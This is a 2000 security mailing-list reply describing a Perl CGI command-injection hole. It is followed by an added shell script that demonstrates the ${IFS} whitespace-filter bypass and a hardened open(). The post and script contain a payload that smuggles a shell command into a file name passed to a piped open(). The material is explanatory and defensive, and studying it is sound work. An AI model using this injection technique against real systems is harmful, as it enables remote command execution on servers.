Vulnerability Development mailing list archives
Re: Serious Hole in Comment/Discussion CGI Script
From: Taneli Huuskonen <huuskone () CC HELSINKI FI>
Date: Sun, 29 Oct 2000 15:53:04 +0200
Joe <joe () blarg net> wrote:

[...]
> Null byte only works if the script decodes the URL-encoded characters in the
> query string, which the script is not doing. Hence, although you can grab any
> '.txt' file, there's no way to inject control characters or whitespace into
> the query string, which limits the damage you can do. The open() call can be
> injected with a pipe ('|') to execute commands, but without whitespace to
> work with there's not much you can do with it.
> [...]

There's the old ${IFS} trick to get around that:

    $file='touch${IFS}foo|';   # single quotes: ${IFS} stays literal, as it would in the query string
    open( FOO, $file );        # trailing '|' makes open() run the string through the shell, which expands ${IFS} to whitespace

Taneli Huuskonen

--
I don't   | All messages will be PGP signed,  | Fight for your right to
speak for | encrypted mail preferred. Keys:   | use sealed envelopes.
the Uni.  | http://www.helsinki.fi/~huuskone/ | http://www.gilc.org/
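An added example, not code from the thread or from the CGI script it discusses, that plays both halves of the exchange above out in POSIX shell: a hypothetical filter standing in for what an undecoded query string lets through (a '|' but no whitespace or control characters), an emulation of Perl's two-argument open() handing a trailing-'|' string to /bin/sh, and, going one step past the thread, a hardened open() that rejects the same payload. The filter, the open() emulation, the scratch directory and the file name "pwned" are assumptions for illustration.

```shell
#!/bin/sh
# Added example: not code from the thread or from the CGI script it discusses.
# It models the two facts the exchange turns on: an undecoded query string that
# reaches Perl's two-argument open() (so '|' gets through but whitespace and
# control characters do not), and /bin/sh expanding ${IFS} to whitespace.
# The filter, the open() emulation and the scratch directory are hypothetical.

# Hypothetical filter: what an undecoded query string effectively enforces.
# Succeeds (returns 0) only when the value has no whitespace or control chars.
passes_filter() {
    case "$1" in
        *[[:space:][:cntrl:]]*) return 1 ;;
        *)                      return 0 ;;
    esac
}

# Emulates Perl's two-argument open(FOO, $file). A trailing '|' means "run
# this command and read its output"; Perl hands a command that contains
# shell metacharacters to /bin/sh -c, and that shell is what expands ${IFS}.
# Anything without the trailing '|' is opened as a plain file.
vulnerable_open() {
    case "$1" in
        *'|') sh -c "${1%?}" ;;     # strip the '|' and run the rest
        *)    cat -- "$1" ;;
    esac
}

# Hardened counterpart: accept only a bare name made of safe characters, and
# nothing that begins with '.' or '-'. The string can never become a command.
safe_open() {
    case "$1" in
        ''|*[!A-Za-z0-9._-]*|.*|-*) return 1 ;;
        *) cat -- "$1" ;;
    esac
}

# Plays the attack out in a scratch directory (constructed input, no real target).
# Returns 0 when every step behaves as the thread describes.
demo() {
    dir=$(mktemp -d) || return 1
    # First try: a command with a real space. The filter stops it.
    spaced="touch $dir/pwned|"
    passes_filter "$spaced" && return 1
    # The ${IFS} trick: no whitespace in the string itself, but /bin/sh turns
    # ${IFS} into whitespace when it runs the command, giving "touch <path>".
    payload="touch\${IFS}$dir/pwned|"
    passes_filter "$payload" || return 1
    vulnerable_open "$payload"
    [ -f "$dir/pwned" ] || return 1
    # The hardened open() refuses the same payload outright.
    safe_open "$payload" && return 1
    rm -rf "$dir"
    return 0
}

demo && echo 'filter bypassed with ${IFS}; hardened open() rejected the payload'
```

Two details worth keeping in mind: Perl only routes a piped open() through /bin/sh when the command contains shell metacharacters, and `${IFS}` supplies `$`, `{` and `}`, so the trick guarantees the very code path that expands it. Stripping whitespace is therefore not a fix; the fix is to stop treating the user's string as an open() mode at all, which is what safe_open models with an allowlist on the bare file name (in Perl, three-argument open with an explicit '<' mode plus the same allowlist).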
Current thread:
- Serious Hole in Comment/Discussion CGI Script Barry Russell (Oct 27)
- Re: Serious Hole in Comment/Discussion CGI Script Vitaly McLain (Oct 27)
- Re: Serious Hole in Comment/Discussion CGI Script Barry Russell (Oct 27)
- Re: Serious Hole in Comment/Discussion CGI Script Joe (Oct 29)
- Re: Serious Hole in Comment/Discussion CGI Script Taneli Huuskonen (Oct 31)
- <Possible follow-ups>
- FW: Serious Hole in Comment/Discussion CGI Script Richard Bartlett (Oct 28)
- Re: FW: Serious Hole in Comment/Discussion CGI Script Bluefish (P.Magnusson) (Oct 29)
- Re: Serious Hole in Comment/Discussion CGI Script Vitaly McLain (Oct 27)